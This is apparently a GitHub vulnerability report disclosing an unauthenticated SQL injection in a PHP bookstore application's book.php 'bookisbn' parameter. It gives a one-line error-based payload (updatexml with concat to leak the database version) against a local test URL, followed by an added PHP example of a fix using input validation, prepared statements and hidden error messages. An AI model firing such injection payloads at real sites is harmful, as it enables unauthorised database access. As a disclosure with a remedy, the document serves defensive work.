There is a SQL injection vulnerability in book.php parameter "bookisbn" #11

Open
@liao10086

Version: 1.0
No login required.
PoC:

http://127.0.0.1:8888/book.php?bookisbn=1' or updatexml(1,concat(0x7e,(version())),0) -- a

View source code book.php
Suggestion: Please filter input of parameter "bookisbn"
Author: zionlab@dbappsecurity.com.cn
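
One way to apply the suggested fix, as an added example that is not part of the original issue or the project's code: validate the ISBN shape, bind it through a prepared statement, and keep database errors out of the response. The table `books`, column `book_isbn`, the helper names and the connection settings are assumptions, since the issue does not show the source of book.php.

```php
<?php
// Added example, not the project's code. Assumed names: table `books`,
// column `book_isbn`, helpers normalize_isbn()/find_book(), DB credentials.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // failures throw

// Shape check only (no checksum): digits and hyphens, optional final X,
// 10 or 13 characters once hyphens are removed. Returns null if rejected.
function normalize_isbn(string $raw): ?string
{
    $isbn = strtoupper(trim($raw));
    if (!preg_match('/^[0-9-]{9,16}[0-9X]$/', $isbn)) {
        return null;
    }
    $len = strlen(str_replace('-', '', $isbn));
    return ($len === 10 || $len === 13) ? $isbn : null;
}

function find_book(mysqli $conn, string $rawIsbn): ?array
{
    $isbn = normalize_isbn($rawIsbn);
    if ($isbn === null) {
        return null; // the PoC value contains quotes and spaces, so it stops here
    }
    // The ? placeholder sends the value separately from the SQL text,
    // so quotes in the input cannot change the statement.
    $stmt = $conn->prepare('SELECT * FROM books WHERE book_isbn = ?');
    $stmt->bind_param('s', $isbn);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

try {
    $conn = new mysqli('127.0.0.1', 'app_user', 'app_password', 'bookstore'); // placeholders
    $raw = $_GET['bookisbn'] ?? '';
    $book = find_book($conn, is_string($raw) ? $raw : ''); // bookisbn[]=... is rejected
    if ($book === null) {
        http_response_code(404);
        exit('Book not found');
    }
    echo htmlspecialchars($book['book_isbn']);
} catch (mysqli_sql_exception $e) {
    // Log server-side only: the updatexml() PoC relies on the database
    // error message being returned in the page.
    error_log($e->getMessage());
    http_response_code(500);
    exit('Internal error');
}
```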
